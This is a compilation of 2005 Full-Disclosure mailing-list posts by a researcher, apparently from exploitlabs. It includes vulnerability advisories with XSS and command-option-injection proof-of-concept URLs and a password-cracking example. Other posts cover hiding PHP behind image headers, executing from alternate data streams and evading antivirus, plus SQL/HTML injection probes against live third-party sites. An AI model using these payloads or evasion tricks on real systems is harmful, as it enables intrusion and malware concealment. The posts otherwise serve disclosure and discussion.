Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fuzzing testing webapp?

[Morning Wood]

I want to do something like this with a script, tool etc, (Looking fuzzing
directory traversal )
http://target/any.asp?data=.../.../.../ -
where the variable data=  -- this  i want to test to found some bugs
http://target/cgi-bin/any.cgi?data=var1var2;


efuzz is good in windows, and has exactly what you want ( although you can
only fuzz one var )
http://www.priestmaster.org/projects/tools/efuzz.zip
( i have found stack overflows with this )

others are avail, such as Peach and Fuzzy, but are python based ( and
work quite well )

the secret Google search string is:
http://www.google.com/search?hl=enq=fuzzer

cheers,
mw
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Famous n3td3v quotes - The Director's Cut(outnow on DVD)

[Morning Wood]

When you're able to ask an employee at a major dot-com to implement
http://security.yahoo.com and they do it, come back to me.

your fucking serious? http://security.yahoo.com/  --- basic security info.
no major dot-com is stupid enough to NOT follow those recomendations,
not to mention it is consumer level advice ( and common sense ). You
have seriously outdone yourself here, and blown your cover of being a
real security researcher.
Please take your drunk, UK meglomaniacal ass and go put a broom in it.
( or just STFU )
unless you can present your formal advisories ( since the flaws are patched,
there is no disclosure worry )
to this list, anything you say is hearsay, and thus not believed. sooo
next time you save us all from death of the interweb, please be kind enough
to back it up with some actual facts so we all can thank you, and realize
just how lucky we are to have you in our hearts ( and search engines ).

the interweb thanks you,
mw

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: Google is vulnerable from XSS attack

[Morning Wood]

As a owner of a Google Group, I would personally like this patched for
the security of my group and that of my personal computer and web
browser.

hmm... did you pay for this group? did'nt think so
read the eula? bet not
who owns you? hint: Google ( they own the world )
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fwd: Report to Recipient(s)

[Morning Wood]

  Only those with broken AV software, since that line is not the EICAR
test
  string, according to the definition of the EICAR test string.

 As many have pointed out, I realize it's supposed to be an attachment :

 http://www.eicar.org/anti_virus_test_file.htm


you would be suprised at all the infected returns  this generated when sent

http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/0919.html
http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/0923.html

( note the : This was a text only message with NAMES only. )
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Paypal phishing attempt

[Morning Wood]

Someone with more time than me please report the following scam:
http://210.202.161.99/us/Account_verification/webscr-cmd=_login/

for sites outside the usa, it is futile to contact ebay about every site.
the best thing is to contact the offending server / hosting / isp
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [OTO-54919]: Re: [Full-disclosure] Paypal phishing attempt]

[Morning Wood]

 Wtf?

 I wasn't aware I needed a ticket created ... is everyone else getting
these?

yes, I think it is tied to an autoresponse email account here on the list
( and very stupid IMHO )
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-Disclosure] Return of the Phrack High Council

[Morning Wood]

oops?

Database error: pconnect(209.173.128.195, snappoll, $Password) failed.
MySQL Error: ()
Session halted.

http://snappoll.com/poll/50150.php

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-Disclosure] Return of the Phrack High Council

[Morning Wood]

hmm, second time vote worked... but um


http://www.snappoll.com/view_results.php?poll_id='50150

Database error: Invalid SQL: SELECT * FROM polls WHERE poll_id='50150
MySQL Error: 1064 (You have an error in your SQL syntax near ''50150' at
line 1)
Session halted.

eek
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] How do you sniff your LAN subnet in nowdaysswitched networks ?

[Morning Wood]

 If you have access to a machine connected to the switch you could try 
 arp-spoofing ( http://en.wikipedia.org/wiki/ARP_spoofing )and redirect 
 traffic to this machine and sniff it there.
 
 More Info:
 http://wiki.ethereal.com/CaptureSetup/Ethernet?action=show
 http://su2.info/doc/arpspoof.php


he might be running Windows.
get cain http://oxid.it  
arp spoof then sniff while your routing packets

cheers
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Hacking Boot camps!

[Morning Wood]

Interesting about the Intense thing... ( sory for your loss )

Blackhat training camps sound pretty good and some of the people are
pretty damn skilled, but these others  Zone-H, Vigilante and the likes
I would avoid. blind leading the blind if you ask me.

I dont know about the others,
but i do know Zone-h Hands on Hacking 2 day seminars are worth it,
have actual hands on hacking labs, and are quite informative.
( and dont claim to be blackhat style training, nor a CEH prep class)
While not targeted for the security professional, they are an exelent way
for
lower level admins, developers, corporate IT, and others that are not
security
savy to learn about real-world attacks and mitigation.

mw
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] another filename bypass vulnerability - fromcmd.exe

[Morning Wood]

I think the OP was getting at this being an AV bypass vector for worms and
other malware that can interact with cmd.exe .
Theroy being that AV will scan by extention ( malware.exe vs malware.ext )
and thus evade detection but yet be executeable.
In light, informal testing this appears to be a realistic scenario that
provides yet another vector for AV bypass. On test systems,
c:\malware.exe.txt runs the malware.exe, and does not open notepad. (
cmd.exe parses the file header, explorer.exe uses .extention )
my2bits,
MW
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FAO Mark Murtagh from Websense

[Morning Wood]

And you're blantant attenpt to turn Morning Wood against me in public was
just pathetic.

funny... as I replied first. I suggest you back up, sit down, and stfu.

kthnx,
mw


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FAO Mark Murtagh from Websense

[Morning Wood]

Heres what Mark Murtagh had to say
http://www.biosmagazine.co.uk/op.php?id=314\ Maybe another ten minutes
of your life wasted ;-)

Content Query has failed - SELECT
opinion.body,opinion.author,opinion.auth_title,opinion.auth_comp,
opinion.ptime,opinion.headline,opinion.category,opinion.active,opinion.forum
, prod_type.name as prod_type, prod_type.id as prod_type_id FROM opinion,
prod_type WHERE opinion.id = 314\\ AND opinion.active = 1 AND opinion.ptime
 1131846681 AND opinion.category = prod_type.id

sweet!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FAO Mark Murtagh from Websense

[Morning Wood]

First you missed the comment where I fixed my typo on the thread,
second, I thought someone of your hacking experience, you would have
been able to translate that message by yourself. In any case, I made

umm, no I doubt I missed anything except your contentless dribble.
but I did notice the error of the web application... not only is it
vulnerable to SQL injection, it is also vuln to XSS. Possibly
you would like to enroll in a Zone-H Hands on Hacking Seminar
so you too might be able to understand them too, instead of filling this
list with your paranoid, meglomanic rants.

http://www.biosmagazine.co.uk/op.php?id=314;okbromgbrbn3td3v/b%20roxbr%20br

http://www.nccgroup.com/events/index.aspx


On 11/13/05, Morning Wood [EMAIL PROTECTED] wrote:
 Content Query has failed - SELECT
 opinion.body,opinion.author,opinion.auth_title,opinion.auth_comp,

opinion.ptime,opinion.headline,opinion.category,opinion.active,opinion.forum
 , prod_type.name as prod_type, prod_type.id as prod_type_id FROM opinion,
 prod_type WHERE opinion.id = 314\\ AND opinion.active = 1 AND
opinion.ptime
  1131846681 AND opinion.category = prod_type.id

 sweet!

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question about ethics when discovering a securityfault in system

[Morning Wood]

Work with the company, coridinate an advisory release when they have the
update avail.
Chances are you will recieve some form of a credit, thanking you for finding
the flaw, and brining it to the mfg's attention.

cheers
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: phpBB 2.0.17 (and other BB systems as well).

[Morning Wood]

By prepending image headers you can often fool php/IE.
This technique has been used successfully to bypass php checking
and renders the php upon access.
---
ÿØÿà JFIF
?php
some phpcode
?
---
or
---
GIF87aÔ

?php
some phpcode
?
---
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Call to participate: GNessUs security scanner

[Morning Wood]

xscan from http://xfocus.org uses nessus plugins and the nasl library.
I have used this tool for years, and the addition of nasl/nessus in 3.x
is wonderfull. If you havent checked out this great tool, do so now.
http://xfocus.org/programs/200507/18.html

cheers,
MW
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Tellme 1.2

[Morning Wood]

- EXPL-A-2005-015 exploitlabs.com Advisory 044 -

  - TellMe -





AFFECTED PRODUCTS
=
TellMe v1.2 and earlier
http://kimihia.org.nz/projects/
http://kimihia.org.nz/projects/tellme/



OVERVIEW

Tellme - get all the lowdown details on an address
Tellme is used to discern what a computer is running,
 and also to help track down servers.
It combines together into one place traceroute tools,
 head requests, server examination, and whois lookups.

TellMe is used widely in default Plesk installs as a bundled
3rd party add on.



DETAILS
===
1. XSS

TellMe does not properly filter malicious script content.
XSS my be inserted in the IP or HOSTparameter.
The malicious script is then rendered and executed in the
 context of the users brower.



2. command option access

Tellme allows access to comand line options of the whois function via:
  render_Open(WHOIS);
 if ( $q_Host )
  passthru(EscapeShellCmd(whois  . $q_This));



3. information disclosure

TellMe discloses path information in error output, echoing
 back the full path to the script.




POC
===
1.
--
 by script inclusion in the q_host parameter
http://[host]/tellme/index.php?q_Host=iframe
src=http://whatismyip.com/iframe


2.
--
 by prepending --* options to the host entry
http://[host]/net/index.php?q_IP=q_Host=--version+test.como_WhoIs=on
http://[host]/net/index.php?q_IP=q_Host=--help+test.como_WhoIs=on


3.
-
 by prepending -- to the Server and HEAD options
http://[host]/net/index.php?q_IP=q_Host=--+test.como_Server=ono_Head=on

Warning:  fsockopen(): unable to connect to --help test.com:80
 in /home/httpd/vhosts/[VHOSTUSER]/httpdocs/net/index.php on line 246





SOLUTION:
=
vendor contact:
Sept 29, 2005
[EMAIL PROTECTED] ( returned )
http://kimihia.org.nz/about/feedback/

Vendor response:
Oct 4, 2005

The author has released an updated version and a diff patch, available at:

Here is the new version:
http://kimihia.org.nz/projects/tellme/files/tellme-1.3_php3.txt

Here is a diff:
http://kimihia.org.nz/projects/tellme/files/tellme-1.2-1.3.diff

Here is the new README:
http://kimihia.org.nz/projects/tellme/files/tellme.txt





Credits
===
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs


mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

orig: http://exploitlabs.com/files/advisories/EXPL-A-2005-015-tellme.txt
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 3

[Morning Wood]

Can you give me an example of a trojan, worm, or another program which has
added the last USB device installed in the Windows Registry,
yes, see below

or how about a program, worm, trojan -

some ASM code... ( edited )
 any_key1 db SYSTEM\CurrentControlSet\AnyKeyIWant, 0
  another_key2 db SYSTEM\CurrentControlSet\AnotherKeyIWant, 0
  invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE, addr any_key1, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, addr hRegkey, NULL
  invoke wsprintf, addr senddata, addr some_value3, addr port
  invoke wsprintf, addr recvdata, addr another_value2, addr port
  invoke RegSetValueEx, hRegkey, addr senddata, 0, REG_SZ, addr recvdata,
eax
  invoke RegCloseKey, hRegkey
( repeat for another_key2 )

easily done in .c too

or
c:\regedt32 -s somebad.reg
( will silently install ANY key you want )


which caused something to be added to the last typed URL?
VNC ( or aformentioned key writes )

how do you think malware writes startup keys? I am confused by your
statement...
once a system has been compromised, ANYTHING can be written to the registry
( especialy is the attacker has SYSTEM privs )



my2bits,
M.W


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] CORE-Impact license bypass

[Morning Wood]

been known since at least v3.2
are you using a 3.x or a 4.x series?
i belive the 4.x requires an auth from core before use

- Original Message - 
From: c0ntex [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Monday, September 26, 2005 3:30 AM
Subject: [Full-disclosure] CORE-Impact license bypass


I seem to have stumbled over a bug in Core Impact
licensing mechanisms that will allow anyone to continually use the
Core Impact product even after the license has expired.

This is not a security issue but it is, I feel, either an oversight or
a feature which can be abused to utilise the Core Impact product for
longer than designed / desired.

In my business funded Core Impact install on this machine, the
license expired at the end of last month and the usualy Your license
has expired pop-up appears, however it is easy to re-enable Core to a
working install by merely changing the system date on the PC to say a
month before the product was due to expire. Oops  ;) I guess Core is
using a very simplistic license mechanism.

Emailed CORE two times, 1 week ago, no reply.
--

regards
c0ntex
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RE: perldiver

[Morning Wood]

the proposed fix is the vendors suggestion, not mine. Feel free to contact
http://scriptsolutions.com/ and tell him yourself kthnx.




- Original Message - 
From: [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Wednesday, September 21, 2005 11:58 AM
Subject: [Full-disclosure] RE: perldiver


 I believe mrwood's proposed fix isnt going to help.  As it just
 strips the first character if it's \w or :

 perhaps when he suggested $module =~ s/^([A-Za-z0-9]|:)//g; he ment
 $module =~ s/[^A-Za-z0-9:]//g;

 Thank you morning_wood for helping promote secure web application
 development.  Keep up the good work.



 Concerned about your privacy? Follow this link to get
 secure FREE email: http://www.hushmail.com/?l=2

 Free, ultra-private instant messaging with Hush Messenger
 http://www.hushmail.com/services-messenger?l=434

 Promote security and make money with the Hushmail Affiliate Program:
 http://www.hushmail.com/about-affiliate?l=427

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] perldiver

[Morning Wood]

  - EXPL-A-2005-014 exploitlabs.com Advisory 043 -

  -perldiver -






AFFECTED PRODUCTS
=
Perldiver v1.x and 2.x
http://scriptsolutions.com/



OVERVIEW

Perl Diver digs into your server's perl installation
 and giving you the information you need and quick
 and easy to find manner.



DETAILS
===
1. XSS

Perldiver does not properly filter malicious script content.
XSS my be inserted in the module parameter. ( v2.x )
or as a GET request in the main script ( v1.x )

The malicious script is the rendered and is executed
 in the context of the users brower.



POC
===

1.x
--
http://[host]/[path]/perldiver.pl?testhereSCRIPTalert(document.domain);/SCRIPT


2.x
--
http://[host]/[path]/perldiver.cgi?action=2020module=scriptdocument.write(document.domain)/script

bonus vendor site vuln:
http://www.scriptsolutions.com/programs/free/perldiver/perldiver.cgi?action=2020module=scriptdocument.write(document.domain)/script



SOLUTION:
=
vendor contact:
Sept 14, 2005
http://www.scriptsolutions.com/support/postlist.pl?Cat=Board=DDBugs
response Sept 15, 2005


If you are a current PerlDiver user, you can either download the updated
version,
or insert the following line after my $module = param( 'module' );
in the module_detail subroutine:

   $module =~ s/^([A-Za-z0-9]|:)//g;

updated version:
http://www.scriptsolutions.com/support/showflat.pl?Board=DLPerlDiverNumber=446
http://www.scriptsolutions.com/support/files/4-446-perldiver.zip



Credits
===
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs


mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

orig advisory:
http://exploitlabs.com/files/advisories/EXPL-A-2005-014-perldiver.txt
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] mimicboard2

[Morning Wood]

  - EXPL-A-2005-013 exploitlabs.com Advisory 042 -

- mimicboard2 -






AFFECTED PRODUCTS

mimicboard2 #086  and lower
http://www.chitta.com/nobu/download/#mimic2




OVERVIEW

Mimic2 is a html open forum type of blog, tailored in
particular to the Japaneese market ( and is very popular )




DETAILS

1. XSS
Mimic2 does not properly filter malicious script content.
XSS my be inserted in the name, title and comment sections,
and is persistant in nature.
The malicious script is the rendered upon visitation and 
is executed in the context of the users brower.

2. information disclosure
http://[host]/mimic2.dat is viewable via the webroot and has
no protection by default. mimic2 stores data in this file
consisting of:
a. administrator passwords
b. user information including refer ip address, message content
   and password if one was used in the post.




POC

1.
input malicious iframe script into the
comment, title and name  sections.
http://[host]/mimic2.cgi
eg:iframe src=[attacker url]/iframe


2.
the password(s) are easily crackable as evidenced by: 

mimic2.dat

echo mimic board2:Fdtr67zbisXVA:13 mimic2.txt

john -w:password.lst mimic2.txt
Loaded 1 password (Standard DES [24/32 4K])
password (mimic board2)




SOLUTION:

vendor contact:
[EMAIL PROTECTED] Aug 24, 2005
no response as of Sept 8, 2005



Credits

This vulnerability was discovered and researched by 
Donnie Werner of exploitlabs

mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org

web: http://exploitlabs.com
web: http://zone-h.org
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Shell32.dll.124.config

[Morning Wood]

sounds like an ADS ( alternate data stream )
http://www.sysinternals.com/Utilities/Streams.html

I wrote this awhile back as notes on a project...

this is a simple example...
Create an executable ADS:
-
c:\type c:\fullpath\exename.exe  somefile.ext:exename.exe
( or somefile.exe:someothername.exe )

Execute an ADS:
---
c:\start c:\pathto\somefile.ext
( starts the example above running exename.exe
behind the visible somefile.ext )
c:\type c:\start.bat  c:\windows\explorer.exe:start.bat
( this creates a file named start.bat that executes
explorer.exe )
c:\start ( will now execute the full path to c:\to\somefile.ext )

hope this helps.


- Original Message - 
From: y0himba [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk
Sent: Monday, September 05, 2005 4:33 PM
Subject: [Full-disclosure] Shell32.dll.124.config


 Hi,
 Yes I am a noob.  I have a question though.  Google searches and a
 few other things can tell me nothing about shell32.dll.124.config.  I am
 on WindowsXP SP2, and keep seeing this file show up in antivirus scans,
but
 cannot find it anywhere on the system!  I think it is dynamically created
by
 something, but after sitting and watching Filemon 7.02 for 20 minutes or
so,
 I give up.  Has anyone heard of this file?  Antivir, Bitdefender, AVG and
 Clam all show it on the system, have scanned it, but have found nothing.
I
 have never seen this file before...

 Thanks in advance for your help!

 -BEGIN GEEK CODE BLOCK-
 Version: 3.1
 GCM/GIT/GO d- s: a C$ UL P L E W N+ o K++
w
 O- M- V-- PS+ PE Y++ PGP++ t+ 5-- X+ R* tv++ b+ DI++ D
 G++ e h r+++ y
 --END GEEK CODE BLOCK--
 Get Your Geek Code:  http://www.geekcode.com

 -- 
 No virus found in this outgoing message.
 Checked by AVG Anti-Virus.
 Version: 7.0.344 / Virus Database: 267.10.18/90 - Release Date: 9/5/2005


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/